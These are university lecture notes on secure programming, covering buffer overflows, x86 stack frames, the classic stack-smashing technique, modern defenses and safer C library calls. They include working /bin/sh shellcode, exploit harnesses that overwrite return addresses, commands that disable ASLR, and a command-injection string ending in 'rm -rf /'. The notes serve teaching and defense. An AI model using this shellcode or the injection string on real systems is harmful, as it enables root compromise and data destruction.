Secure Programming II: The Revenge

Lecture for 5/11/20

(slides from Prof. Dooley)

CS 330 Secure Programming 13 Administrivia

• Seminar on Tuesday (5/12, 7pm): Tech Career Tips and Strategies for International Students (Extra credit!)

• HW 6 (password cracking) due Thursday night

CS 330 Secure Programming Recall: Secure programming problems

• Resource exhaustion
• Incomplete mediation (checking valid data)
• Time-of-check to time-of-use errors
• Other race conditions
• Numeric over/underflow
• Trust in general (users and privileges, environment variables, trusting other programs)

CS 330 Secure Programming 15 General principles of secure software

• Simplicity is a virtue
• If code is complex, you don’t know if it’s right (but it probably isn’t)
• In a complex system, isolate the security-critical modules. Make them simple
• Modules should have a clean, clear, precisely defined interface

CS 330 Secure Programming 16 General principles of secure software - 2

• Reliance on global state is bad (usually)
• Reliance on global variables is bad (usually)
• Use of explicit parameters makes input assumptions explicit
• Validate all input data
• Don’t trust the values of environment variables
• Don’t trust library functions that copy data

CS 330 Secure Programming 17 Buffer Overflows

CS 330 Secure Programming Buffer Overflow • 1988: Morris worm exploits buffer overflows in fingerd to infect 6,000 Unix servers

• 2001: Code Red exploits buffer overflows in IIS to infect 250,000 servers
– Single largest cause of vulnerabilities in CERT advisories
– “Buffer overflow threatens Internet” (WSJ, 1/30/01)

• CERT advisory dated 12 April 2005 notes several vulnerabilities in MS Windows, including three buffer overflows in Explorer, MSN Messenger, and MS Exchange Server.

CS 330 Secure Programming 19 More buffer overflows

• A buffer overflow in Apple’s Quicktime (January 7, 2007)

• Buffer overflows in Mozilla products (December 20, 2006)

CS 330 Secure Programming 20 Recent Buffer Overflow Exploits

• 01/20/2016 - Oracle Outside In versions 8.5.2 and earlier contain stack buffer overflow vulnerabilities in the parsers for WK4, Doc, and Paradox DB files, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.

• 06/29/2016 - WECON LeviStudio BaseSet ScrIDWordAddr Buffer Overflow Remote Code Execution Vulnerability (ZDI-16-384): This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WECON LeviStudio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

CS 330 Secure Programming 21 More Buffer Overflow

• Just so you don’t get too complacent, CERT also lists an advisory with a buffer overflow problem in McAfee’s Virus Scan Engine!
• http://www.kb.cert.org/vuls/id/361180

CS 330 Secure Programming 22 Basics of Buffer Overflows

• A buffer, of course, is an area of memory that you set aside to hold data for your program
– it can be a string (char name[30];)
– or an array of structures (struct employee gburg_div[MAX];)
– or just an array of pointers to other buffers (struct account *checking[FOO];)

CS 330 Secure Programming 23 Basics of Buffer Overflows

• Buffers are everywhere in your programs

• In languages like C and C++, you can make them dynamically using system functions like malloc() and realloc() and free them using free()

• In object oriented languages, you can also make them dynamically by instantiating new objects

• Remember that an array is an object in Java, so
– int[] myList = new int[42]; // is an object

CS 330 Secure Programming 24 What is a buffer overflow?

• A buffer overflow occurs when your program (either through an inadvertent use or a malicious attack) allows data to be written outside the boundary of the buffer – usually to memory immediately after the buffer

CS 330 Secure Programming 25 What is a buffer overflow?

• If the buffer is on the stack this is called a stack buffer overflow (often loosely a “stack overflow”) or, more colorfully, “smashing the stack”

• How does a buffer get on the stack?
– if it’s a local variable or a function argument

• This is possible because many programming languages and operating systems don’t do bounds checking on buffers

CS 330 Secure Programming 26 Why is this a security problem?

• Overflowed data could be anything
– A pointer that tells the program what instructions to execute next (e.g., a pointer to a different function, or a return address on the stack)
– An integer where “0” means that you can’t access a particular file and “1” means you can. A hacker would overwrite the “0” with a “1” and access the file
– Even a minor change could cause the program to crash, which can be a security problem (denial-of-service attacks and core dump exploits are very serious)
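The access-flag case can be sketched in a few lines of C. This is only an illustration: the struct `record`, its fields, and both function names are made up for this example. To keep the behavior well-defined, the unchecked copy writes into the bytes of one struct instead of running past a real stack array, but the effect is the one described: bytes beyond the 8-byte name land in the neighboring flag.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical record: an 8-byte name followed by an access flag. */
struct record {
    char name[8];
    int  allowed;   /* 0 = access denied, 1 = access granted */
};

/* Copies len bytes into the record starting at the name field, without
 * checking len against sizeof(r->name). The writes stay inside the
 * struct as long as len <= sizeof(struct record). */
void copy_name_unchecked(struct record *r, const char *input, size_t len)
{
    memcpy((char *)r, input, len);
}

/* Builds an input that fills name with 'A' and then overwrites the
 * allowed field with the value 1. Returns the input length, or 0 if
 * out is too small. */
size_t build_overlong_input(char *out, size_t out_size)
{
    int one = 1;
    size_t flag_offset = offsetof(struct record, allowed);
    size_t len = flag_offset + sizeof(one);

    if (out_size < len)
        return 0;
    memset(out, 'A', flag_offset);
    memcpy(out + flag_offset, &one, sizeof(one));
    return len;
}
```

Calling copy_name_unchecked() with the output of build_overlong_input() on a record whose allowed field is 0 leaves that field set to 1, even though the code never assigns to it.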

CS 330 Secure Programming 27 How could this happen?

• The programmer might not check the size of the buffer first before trying to put all of the data into it

• Languages like C/C++ don’t automatically check the bounds of the buffer

CS 330 Secure Programming 28 How could this happen?

• Programmers who use C/C++ are responsible for performing this check. Often they don’t

• The problem can be a lot more complex when you start talking about supporting international character sets and copying/ formatting/ processing buffers that store different kinds of things

CS 330 Secure Programming 29 Technical Details...

CS 330 Secure Programming L/Unix permission structures

Every file has a number of permission bits associated with it
• Owner/User - rwx
• Group - rwx
• Other - rwx
• Setuid bit
– Real vs effective userid and groupid
• Directory/regular file bit
• Sticky bit

CS 330 Secure Programming L/Unix Process memory image

Allocators request additional heap memory from the operating system using the sbrk() function

CS 330 Secure Programming 32 IA32/Linux Register Usage

• Integer Registers
– Two have special uses
• %ebp, %esp
– Three managed as callee-save
• %ebx, %esi, %edi
• Old values saved on stack prior to using
– Three managed as caller-save
• %eax, %edx, %ecx
• Do what you please, but expect any callee to do so, as well
– Register %eax also stores returned value

Register   Role
%eax       Caller-save temporary
%edx       Caller-save temporary
%ecx       Caller-save temporary
%ebx       Callee-save temporary
%esi       Callee-save temporary
%edi       Callee-save temporary
%esp       Special
%ebp       Special

In the x86-64 architecture there are also %rax, %rbx, %rsp, %rbp, etc.

CS 330 Secure Programming 33 x86-64 Registers

The program instruction counter %rip is also available.

CS 330 Secure Programming 34 Copying Data and Registers

• Moving Data (Really Copying)
– movl Source,Dest
• Move 4-byte (“long”) word
– Accounts for 31% of all instructions in sample

CS 330 Secure Programming 35 Addressing Modes for i86

• Immediate: Constant integer data
– Like C constant, but prefixed with ‘$’
– E.g., $0x400, $-533
– Encoded with 1, 2, or 4 bytes
• Register: One of 8 integer registers
– But %esp and %ebp reserved for special use
– Others have special uses for particular instructions
• Memory: 4 consecutive bytes of memory
– Various addressing modes
– value(%register)
– E.g., 8(%eax) means the contents of %eax plus 8, used as the memory address

CS 330 Secure Programming 36 IA32 Simple Addressing Modes

• Normal (R) Mem[Reg[R]]
– Register R specifies memory address
– movl (%ecx), %eax => int t = *p;

• Displacement D(R) Mem[Reg[R]+D]
– Register R specifies start of memory region
– Constant displacement D specifies offset
– movl 8(%ecx),%edx => int t = p[2];
– movl 8(%ebp),%edx => int t = some_arg;
• %ebp, %esp used to reference stack. Stack contains arguments to function

CS 330 Secure Programming 37 movl Operand Combinations

Source  Destination  Example              C Analog
Imm     Reg          movl $0x4,%eax       eax = 0x4;
Imm     Mem          movl $-147,(%eax)    *eax = -147;
Reg     Reg          movl %eax,%edx       edx = eax;
Reg     Mem          movl %eax,(%edx)     *edx = eax;
Mem     Reg          movl (%eax),%edx     edx = *eax;

– Cannot do memory-memory transfers with single instruction
• Example of NON-ORTHOGONALITY in the IA32 ISA
– Makes it much harder to program or compile for

CS 330 Secure Programming 38 IA32 Stack

– Register %esp (%rsp) indicates lowest allocated position in stack (the “top”)
• Pushing
– pushl src
– Fetch operand at src
– Decrement %esp by 4
– Write operand at address given by %esp
• Popping
– popl dest
– Read operand at address given by %esp
– Increment %esp by 4
– Write to dest

(Figure: the stack “bottom” is at the highest address and addresses increase toward it; the stack grows down, and the stack pointer %esp marks the stack “top”.)

CS 330 Secure Programming 39 IA32 Stack Discipline

• ret
– Pops into %eip (returns to the next instruction after the call)
• Stack “frame” stores the context in which the procedure operates
• Stack-based languages
– Stack stores context of procedure calls
– Multiple calls to a procedure can be outstanding simultaneously
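The push and pop steps for a downward-growing stack can be mimicked in plain C. This is a toy model, not how the hardware is implemented: `struct toy_stack`, `STACK_BYTES`, and the `toy_*` functions are names invented for this sketch, and the `esp` field is just an offset into a byte array standing in for %esp. In this model, ret is simply a pop whose destination is %eip.

```c
#include <stdint.h>
#include <string.h>

#define STACK_BYTES 64

/* Hypothetical toy machine: a byte array for stack memory and an
 * offset standing in for %esp. */
struct toy_stack {
    unsigned char mem[STACK_BYTES];
    uint32_t esp;   /* offset of the current "top" */
};

void toy_init(struct toy_stack *s)
{
    memset(s->mem, 0, sizeof(s->mem));
    s->esp = STACK_BYTES;   /* empty stack: esp sits at the highest address */
}

/* pushl: decrement esp by 4, then write the operand at esp.
 * Returns 0 on success, -1 if the stack is full. */
int toy_push(struct toy_stack *s, uint32_t value)
{
    if (s->esp < 4)
        return -1;
    s->esp -= 4;
    memcpy(&s->mem[s->esp], &value, 4);
    return 0;
}

/* popl: read the operand at esp, then increment esp by 4.
 * Returns 0 on success, -1 if the stack is empty. */
int toy_pop(struct toy_stack *s, uint32_t *dest)
{
    if (s->esp + 4 > STACK_BYTES)
        return -1;
    memcpy(dest, &s->mem[s->esp], 4);
    s->esp += 4;
    return 0;
}
```

Pushing two values moves esp from 64 to 56, and popping returns them in reverse order, which is why the most recently pushed return address is the first thing ret sees.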

CS 330 Secure Programming 40 Executing Functions

0x00001f50 : push %ebp
0x00001f51 : mov %esp,%ebp
0x00001f53 : sub $0x28,%esp

These three lines (or something like them) are called the Function Prologue. The GCC compiler adds it automatically on the standard x86 (32-bit) and x86_64 (64-bit) architectures.

The Function Prologue's main purpose is to preserve, on the stack, the value of the base pointer of the previous frame, that is, the calling function's stack frame. It then sets up the new frame's base pointer and reserves stack space for local variables.

On the 32-bit architecture, the EBP register is used for this purpose; on the 64-bit architecture, the RBP register.

Similarly, at the end of the assembly dump, there's the Function Epilogue, which undoes the work of the Prologue, in reverse. The epilogue typically consists of the leave and ret instructions.

CS 330 Secure Programming 42 IA32 Stack Frame Example

Consider the code:

void foo(int a, int b, int c) {
    char buf1[8];
    char buf2[16];
}
void main( ) {
    foo(1, 2, 3);
}

See BufferOverflow/0OverflowExample/WakeExamples/simple.c

The corresponding assembly:

    .text
.globl _function
_function:
    pushl %ebp
    movl %esp, %ebp
    subl $40, %esp
    leave               # the function epilogue
    ret
.globl _main
_main:
    pushl %ebp
    movl %esp, %ebp
    subl $24, %esp
    movl $3, 8(%esp)
    movl $2, 4(%esp)
    movl $1, (%esp)
    call _function
    leave
    ret

CS 330 Secure Programming IA32/Linux Stack Frame

• Callee Stack Frame (“Top” to Bottom)
– Parameters for called functions
– Local variables
– Saved register context
– Old frame pointer
• Caller Stack Frame
– Return address
• Pushed by call instruction
– Arguments for this call

Stack layout for the example, highest address first:

c                            (caller's stack frame)
b
a
return address
(SFP) Stack Frame Pointer
buf1
buf2                         <== %esp (Stack Ptr), low mem addr

CS 330 Secure Programming 44 Smashing the Stack for Fun and Profit - updated for 2016 (original paper by Aleph One, 1996)

• Review: Process memory organization
• The problem: Buffer overflows
• How to exploit the problem
• Implementing the Exploit
• Results
• Conclusion and discussion

CS 330 Secure Programming Process Memory Organization - x86

CS 330 Secure Programming Function Calls

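CS 330 Secure Programming Buffer Overflows

WakeExamples/ovflow1.c

#include <string.h>

void function(char *str) {
    char buffer[8];
    strcpy(buffer, str);        /* no bounds check: 255 characters go into 8 bytes */
}

int main(void) {
    char large_string[256];
    int i;
    for (i = 0; i < 255; i++)
        large_string[i] = 'A';
    large_string[255] = '\0';   /* terminate the string so strcpy() knows where to stop */
    function(large_string);
    return 0;
}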

CS 330 Secure Programming Modifying the Execution Flow WakeExamples/ovflow2.c

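#include <stdio.h>

void function() {
    char buffer1[4];
    int *ret;
    ret = (int *)(buffer1 + 8);   /* aim at the saved return address; the offset depends on the compiler */
    (*ret) += 8;                  /* move the return address past the x = 1 assignment */
}
int main() {
    int x = 0;
    function();
    x = 1;
    printf("%d\n",x);
}

Need to fix the constants for this example. Also compile with -fno-stack-protector and -z execstack. Do this in SEED-Ubuntu.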

CS 330 Secure Programming Exploiting Overflows - Smashing the Stack

• Now we can modify the flow of execution - what do we want to do now?

• Spawn a shell and issue commands from it

CS 330 Secure Programming Exploiting Overflows - Smashing the Stack

• What if there is no code to spawn a shell in the program we are exploiting?

• Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!

CS 330 Secure Programming Implementing the Exploit

• Writing and testing the code to spawn a shell
• Putting it all together - an example of smashing the stack
• Exploiting a real target program

CS 330 Secure Programming .c Spawning a Shell

#include <stdlib.h>   /* exit() */
#include <unistd.h>   /* execve() */

void main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    exit(0);
}

Take this program (which spawns a shell) and compile it to assembly language. Use objdump -d to take a look at the assembly code and relative addresses.

CS 330 Secure Programming Spawning a Shell

char shellcode[] = {
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh"
};

CS 330 Secure Programming Testing the Shellcode

smash.c

char shellcode[] = {
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh"
};
void main() {
    int *ret;
    ret = (int *) &ret + 2;
    (*ret) = (int) shellcode;
}

CS 330 Secure Programming Testing the Shellcode

Note that in C, the +2 is +2 integers, or 8 bytes.
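A quick way to convince yourself of the scaling rule is to measure it. The helper below is a made-up name for this sketch; it reports how many bytes apart p and p + n are for an int pointer. The result is n * sizeof(int), which is 8 for n = 2 only on platforms where int is 4 bytes.

```c
#include <stddef.h>

/* Returns the distance in bytes between p and p + n.
 * p + n must stay inside (or one past the end of) the array p points into. */
size_t int_step_bytes(int *p, size_t n)
{
    return (size_t)((char *)(p + n) - (char *)p);
}
```

For example, with int a[4], int_step_bytes(a, 2) equals 2 * sizeof(int).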

CS 330 Secure Programming 74 Putting it all Together

smashAll.c

char shellcode[]="\xeb\x1f\…. \xb0\x0b\xff/bin/sh";
char large_string[128];
void main() {
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;
    for (i = 0; i < strlen(shellcode); i++)
        large_string[i] = shellcode[i];
    strcpy(buffer,large_string);
}

CS 330 Secure Programming Exploiting a real program

But these techniques don’t work as well as they used to…

CS 330 Secure Programming 82 Some good news.....

• It is much harder to smash the stack these days because of some modern defenses
– NX bit
– gcc and clang StackGuard/ProPolice
– address space layout randomization (ASLR)

In order to do a stack smashing exploit, you need to place the code you want to execute in the stack or data segment of the program and transfer control to it.

You used to do this by creating a global array in the data segment and then transferring control (via the return address on the stack) to that location.

BUT, recent x86 processors and operating systems support a no-execute page protection bit (XD, eXecute Disable, in Intel's terminology; NX at AMD and in Linux-land) that makes the above approach pretty much moot.

In new versions of modern OSs (Linux, Windows, and OS X among them), jumping to the data segment to execute code will more than likely cause a segmentation fault because those data segments will most likely be stored in a memory page that has the NX bit set.

• Recent versions of gcc (and other compilers) implement a canary called ProPolice (originally from IBM) that puts a guard at the end of the stack frame

The basic idea is to place a chosen or pseudo-random value between a stack frame's data elements (e.g. char *buffer) and its control elements (e.g. RET address, stored EBP, etc.) that is impossible for an attacker to predict. Before the function whose frame has been clobbered is allowed to return, this canary is checked against a known good value. If that check fails, the process terminates, since it now considers its execution path to be in an untrusted state.

You can turn it off using -fno-stack-protector
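The canary check can be imitated by hand to see why it catches a linear overflow. This is a simulation under stated assumptions, not what the compiler emits: `struct guarded_frame` and `fill_and_check` are invented for this sketch, the "frame" is an ordinary struct, and the secret is passed in by the caller instead of being generated at program start.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a protected stack frame: the buffer comes
 * first, then the canary, then the saved return address. */
struct guarded_frame {
    char          buffer[16];
    unsigned long canary;
    unsigned long return_address;
};

/* Copies len bytes into the frame starting at buffer, the way an
 * unchecked copy would, then performs the check that runs before the
 * function returns. Returns 0 if the canary is intact and -1 if it was
 * clobbered (a real program would abort at that point).
 * len must not exceed sizeof(struct guarded_frame). */
int fill_and_check(struct guarded_frame *f, unsigned long secret,
                   const char *input, size_t len)
{
    f->canary = secret;
    memcpy((char *)f, input, len);
    return f->canary == secret ? 0 : -1;
}
```

An input of 16 bytes or fewer leaves the canary alone. Anything long enough to reach return_address has to run through the canary first, so the check fails before the corrupted address is ever used.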

• Newer compilers also tend to allocate much more stack space than older versions did (memory is cheap), so it's harder to overflow the stack.

CS 330 Secure Programming 87 Address Space Layout Randomization

Almost any recent Linux and OS X kernel will by default randomize the address of the stack, the base address for memory areas allocated by mmap, the brk() base address, and the address of the vdso (a virtual dynamically-linked shared object) page of a program, at exec() time. (In particular, shared libraries will be loaded at randomized addresses.)

On Linux machines you can disable this (as root) via

# echo 0 > /proc/sys/kernel/randomize_va_space

But this won’t work on OS X (there’s no /proc file system).

CS 330 Secure Programming 88 Exploiting a Real Program

• It’s easy to execute our attack when we have the source code

• What about when we don’t? How will we know what our return address should be?

CS 330 Secure Programming How to find Shellcode

1. Guess
- time consuming
- being wrong by 1 byte will lead to segmentation fault or invalid instruction

CS 330 Secure Programming How to find Shellcode

2. Pad shellcode with NOPs, then guess (called the NOP slide, or NOP sled)
- we don’t need to be exactly on
- much more efficient
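Why the padding helps can be seen from the layout alone. The sketch below only arranges bytes in a buffer; `build_sled` and `guess_works` are hypothetical names, and the payload is whatever placeholder bytes the caller passes in. It assumes the x86 one-byte NOP opcode 0x90.

```c
#include <stddef.h>
#include <string.h>

#define NOP 0x90   /* x86 one-byte no-op */

/* Fills out[0 .. out_len) with NOPs and places the payload at the very end.
 * Returns the length of the NOP run, or (size_t)-1 if the payload
 * does not fit. */
size_t build_sled(unsigned char *out, size_t out_len,
                  const unsigned char *payload, size_t payload_len)
{
    size_t sled_len;

    if (payload_len > out_len)
        return (size_t)-1;
    sled_len = out_len - payload_len;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, payload, payload_len);
    return sled_len;
}

/* A guessed offset into the buffer works if it lands anywhere in the
 * NOP run or exactly on the first payload byte. */
int guess_works(size_t guess, size_t sled_len)
{
    return guess <= sled_len;
}
```

With a 64-byte buffer and a 4-byte payload, 61 different offsets work instead of exactly one, which is the whole point of the padding.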

CS 330 Secure Programming Small Buffer Overflows

• If the buffer is smaller than our shellcode, we will overwrite the return address with instructions instead of the address of our code

• Solution: place shellcode in an environment variable then overflow the buffer with the address of this variable in memory

• Can make environment variable as large as you want

• Only works if you have access to environment variables

CS 330 Secure Programming Summary

• ‘Smashing the stack’ works by injecting code into a program using a buffer overflow, and getting the program to jump to that code

• By exploiting a program that runs as root, a user can get it to exec a shell (e.g., /bin/sh) and gain root access

CS 330 Secure Programming Summary

• Buffer overflow vulnerabilities are the most commonly exploited- account for about half of all new security problems (CERT)

• Are relatively easy to exploit

• Many variations on stack smash- heap overflows, internet attacks, etc.

CS 330 Secure Programming Spawning a Shell

void main() {
__asm__("
    jmp 0x2a
    popl %esi
    movl %esi,0x8(%esi)
    movb $0x0,0x7(%esi)
    movl $0x0,0xc(%esi)
    movl $0xb,%eax
    movl %esi,%ebx
    leal 0x8(%esi),%ecx
    leal 0xc(%esi),%edx
    int $0x80
    movl $0x1, %eax
    movl $0x0, %ebx
    int $0x80
    call -0x2f
    .string \"/bin/sh\"
");
}

Then we assemble it to object code (you can find the object code by using objdump or gdb)

CS 330 Secure Programming Preventing Buffer Overflows (for C programmers)

• Well, clearly scenarios like the last one are bad. • How to prevent them?

CS 330 Secure Programming 96 What can cause buffer overflows?

• Careless use of buffers without bounds checking.
• Formatting and logical errors.
• Unsafe library function calls.
• Off-by-one errors.
• Old code used for new purposes (like UNICODE international characters).
• All sorts of other far-fetched but deadly-serious things you should think about.

CS 330 Secure Programming 97 Careless use of buffers w/o bounds checking

• This is the classic case and the easiest to prevent.
• Remember that C/C++ doesn’t do automatic bounds checking for you.
• If you declare an array as int A[100] there is nothing in the C language to stop you from executing a statement like A[555] = 1234;
• You don’t need to access an array with an invalid index to have a buffer overflow.
• Pointer arithmetic is an equally likely culprit
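Since the language will not do the check, the program has to. One possible shape for that check is a small accessor that every write goes through; `set_checked` is a name made up for this sketch, and the caller is assumed to pass the true length of the array.

```c
#include <stddef.h>

/* Stores value at a[index] only if index is within [0, len).
 * Returns 0 on success, -1 if the index is out of bounds. */
int set_checked(int *a, size_t len, size_t index, int value)
{
    if (a == NULL || index >= len)
        return -1;
    a[index] = value;
    return 0;
}
```

With int A[100], set_checked(A, 100, 555, 1234) returns -1 and leaves memory alone, where the bare statement A[555] = 1234; would have written far past the end of the array. Using an unsigned index type also rules out negative indexes.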

CS 330 Secure Programming 98 Use of buffers w/o bounds checking - Consequences

• If the buffer overflow is big enough the attacker can hijack the machine.
• In UNIX, a buffer overflow of less than 50 bytes in a process that has root privileges can be used to “spin a shell”
• The attacker obtains a command shell with root privileges.

• Hijacking the machine can also be done by a worm as it spreads.
• Never assume that small buffers are safe
• Attack code can be placed in another buffer, beyond the return pointer, or on the heap.

CS 330 Secure Programming 100 Buffered consequences?

• Any security-sensitive data that follows the buffer can be overwritten
– passwords or variables that designate privileges.
• The software might crash
– This can cause a core dump giving the attacker access to any security-sensitive data that was in the program’s memory at the time of the core dump

CS 330 Secure Programming 101 Bounds checking - Recommendations

• Before you copy to, format, or send input to a buffer, make sure it is big enough to hold whatever might be thrown at it
• Testing should catch most of this kind of buffer overflow

• When you test with a very long string, a buffer overflow will usually show up as a crash or as corrupted data
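A minimal sketch of "check first, then copy": the helper below refuses the copy outright when the source does not fit. The name `copy_if_fits` and the choice to reject instead of truncate are assumptions for this example; truncating is a reasonable alternative when a partial string is acceptable.

```c
#include <stddef.h>
#include <string.h>

/* Copies src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success, -1 (leaving dst untouched) if src is too long. */
int copy_if_fits(char *dst, size_t dst_size, const char *src)
{
    size_t needed = strlen(src) + 1;   /* characters plus the NUL */

    if (needed > dst_size)
        return -1;
    memcpy(dst, src, needed);
    return 0;
}
```

With an 8-byte destination, a 7-character string is accepted and an 8-character string is rejected, because the terminator needs a byte too.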

CS 330 Secure Programming 102 Formatting and logical errors – Problem

• The size in bytes of the input might not be what causes the buffer overflow; it might be the value of the input itself
– if you’re converting a large integer to a string, make sure the buffer is long enough to hold all possible outputs.
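For the integer-to-string case, snprintf() can do the size check for you, because it never writes more than the size it is given and returns the length the full output would have needed. The wrapper name `format_long` is made up for this sketch.

```c
#include <stdio.h>
#include <stddef.h>

/* Formats value as decimal text into dst.
 * A return value from snprintf() that is >= dst_size means the output
 * was truncated. Returns 0 on success, -1 if dst is too small. */
int format_long(char *dst, size_t dst_size, long value)
{
    int n = snprintf(dst, dst_size, "%ld", value);

    if (n < 0 || (size_t)n >= dst_size)
        return -1;
    return 0;
}
```

A 4-byte buffer is fine for 123 but not for 123456, even though both inputs occupy the same number of bytes as a long. A buffer of 32 bytes is enough for any 64-bit long, sign and terminator included.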

CS 330 Secure Programming 103 Formatting and logical errors – Consequences

• Even if the attacker has very little control of the data that overwrites a return pointer, they can always crash the program by sending the program control to random places in memory

• Crashing the program is a security risk for many reasons, including denial-of-service attacks and core dumps of security-sensitive data

• It’s never safe to assume that a clever attacker can’t find a way to give input that causes the output he wants

CS 330 Secure Programming 104 Formatting and logical errors – Recommendations

• Always test a variety of inputs to make sure the program behavior is what you expect
• Code inspection is likely to catch buffer overflow errors that testing doesn’t
• Assume that ALL buffer overflows are security problems
• Don’t assume that all buffer overflows are caused by long strings

CS 330 Secure Programming 105 Unsafe library calls - Problem

• Unsafe library functions are one of the main constituents of the buffer overflow problem
• Many library functions don’t do bounds checking unless explicitly told to
• Many functions use format strings
– open the door to all sorts of weird exploits

CS 330 Secure Programming 106 Unsafe library calls - Consequences

• Most library function calls that result in buffer overflows allow the attacker to hijack the machine using stack smashing • They also can corrupt security-sensitive data or crash the program

CS 330 Secure Programming 108 Unsafe Unix library calls - Recommendations

• Only use functions that do bounds checking
• Never, ever, ever use gets(). Only under freak conditions will it NOT cause a buffer overflow. Use fgets() instead
• Also avoid functions like strcpy() and strcat(). Use strncpy() and strncat() instead, and remember that strncpy() does not add a terminating NUL when the source fills the buffer
• Use field-width specifiers (e.g., %511s) with the scanf() family of functions (scanf(), fscanf(), sscanf(), etc.). Otherwise they will not do any bounds checking for you
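Two of these replacements are sketched below. Both helper names are invented for this example. read_line() wraps fgets(), which is told the buffer size and so cannot run past it; copy_truncated() wraps strncpy() and adds the terminator by hand, since strncpy() leaves the destination unterminated when the source is at least as long as the limit.

```c
#include <stdio.h>
#include <string.h>

/* Reads one line from in into buf (at most size - 1 characters) and
 * strips the trailing newline, if any. Returns 0 on success, -1 on EOF
 * or error. If the line is longer than the buffer, the remainder stays
 * in the stream for the next read. */
int read_line(FILE *in, char *buf, size_t size)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    buf[strcspn(buf, "\n")] = '\0';
    return 0;
}

/* Copies as much of src as fits into dst and always terminates dst. */
void copy_truncated(char *dst, size_t size, const char *src)
{
    if (size == 0)
        return;
    strncpy(dst, src, size - 1);
    dst[size - 1] = '\0';
}
```

A typical call is read_line(stdin, line, sizeof line), with line declared as a char array so that sizeof reports its real capacity.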

CS 330 Secure Programming 109 Unsafe Unix library calls - Recommendations

• Be careful with sprintf(). Use precision specifiers or use snprintf() instead
• Never use variable format strings with the printf() family of functions
• Every file or path handling library function has its own quirks, so be careful
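Both printf-family rules fit in one small sketch: the format string is a constant, the untrusted text is passed only as an argument, and snprintf() is given the real buffer size. The function name and the "user: " prefix are made up for this example.

```c
#include <stdio.h>
#include <stddef.h>

/* Writes "user: <msg>" into out. Because msg is only ever a %s argument,
 * any '%' characters inside it are copied literally instead of being
 * interpreted as conversions.
 * Returns 0 on success, -1 if the output had to be truncated. */
int format_user_message(char *out, size_t out_size, const char *msg)
{
    int n = snprintf(out, out_size, "user: %s", msg);

    if (n < 0 || (size_t)n >= out_size)
        return -1;
    return 0;
}
```

The dangerous variant would be snprintf(out, out_size, msg), where input such as "%x%x%n" is treated as a format string chosen by the attacker.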

CS 330 Secure Programming 110 C Library Call Recommendations

• Functions like fgets(), strncpy(), and memcpy() are okay – make sure your buffer is the size you say it is. Be careful of off-by-one errors

CS 330 Secure Programming 111 And one more library call...

Consider the following piece of code:

char buffer[BUFFERLEN];
char *filename;

/* We read filename from the user somehow */
snprintf(buffer, sizeof(buffer), "cat %s", filename);
system(buffer);

Consider what happens if the user gives us a filename like "/etc/hosts ; rm -rf /": system() hands the whole string to a shell, which runs the second command too.

versus

char *filename;

/* We read filename from the user somehow */

execl("/bin/cat", "/bin/cat", filename, NULL);

Here no shell is involved, so cat receives the entire string as a single file name.

CS 330 Secure Programming 112 C Library Call Recommendations

• Static analyzers such as ITS4 are very useful tools for finding unsafe library function calls during code inspection

• Testing will catch many, but not all, buffer overflows. Code inspection in combination with testing will produce the best results

CS 330 Secure Programming 113 Off-by-one errors - Problem

• Occur when a programmer takes the proper precautions in terms of bounds checking, but maybe puts a 512 where she should have put a 511
• Can happen to the best programmers no matter how well-informed they are about buffer overflows

CS 330 Secure Programming 114 Off-by-one errors - Consequences

• Usually off-by-one errors can do no more than crash the program
• Sometimes, though, they can be made to compromise security-sensitive data

• Either way, any buffer overflow is a security risk

CS 330 Secure Programming 115 Off-by-one errors - Recommendations

• If you have a 512 byte buffer you can only store 511 characters in the string (the last character is the terminating NUL, '\0')
• If you use scanf() to read into a buffer you also have to account for the NUL:
– use scanf("%511s", My512ByteBuffer) instead of
– scanf("%512s", My512ByteBuffer) or
– scanf("%s", My512ByteBuffer)
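The same rule on a smaller scale, so the effect is easy to see: an 8-byte buffer takes a field width of 7. The function `first_word` and the constant `WORD_BUF` are hypothetical, and sscanf() is used instead of scanf() only so the input can be supplied as a string.

```c
#include <stdio.h>

#define WORD_BUF 8

/* Parses the first whitespace-delimited word of line into word, which
 * must have room for WORD_BUF bytes. The field width is WORD_BUF - 1 so
 * that the terminating NUL always fits.
 * Returns 1 if a word was read, 0 otherwise. */
int first_word(const char *line, char word[WORD_BUF])
{
    return sscanf(line, "%7s", word) == 1;
}
```

Given the input "abcdefghijklmnop", the buffer ends up holding "abcdefg" plus the NUL. Writing "%8s" here would store eight characters and then put the NUL one byte past the end of the buffer.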

CS 330 Secure Programming 116 Off-by-one errors - Recommendations

• If you declare an array as int A[100], remember that you can’t access A[100], the highest index you can access is A[99] and the lowest is A[0]

• The best defense against off-by-one errors of any kind is a thorough combination of testing and code inspection

CS 330 Secure Programming 117 Old code used for new purposes - Problem

• Often old code is reused in new projects

• Even if the old code was thoroughly tested and written in a safe manner, it might not have accounted for things that the new code expects it to support, – like international character sets

CS 330 Secure Programming 118 Old code used for new purposes - Consequences

• “HELLO” in ASCII is 0x48-0x45-0x4C-0x4C-0x4F
• “HELLO” in UNICODE (16-bit encoding) is 0x00-0x48-0x00-0x45-0x00-0x4C-0x00-0x4C-0x00-0x4F
• The old code might tell the new code to give it no more than 5 characters because it uses a 5-byte buffer
• The new code gives it 5 characters, but in UNICODE instead of ASCII, so they fill 10 bytes
• Assuming 5 characters = 5 bytes is dangerous
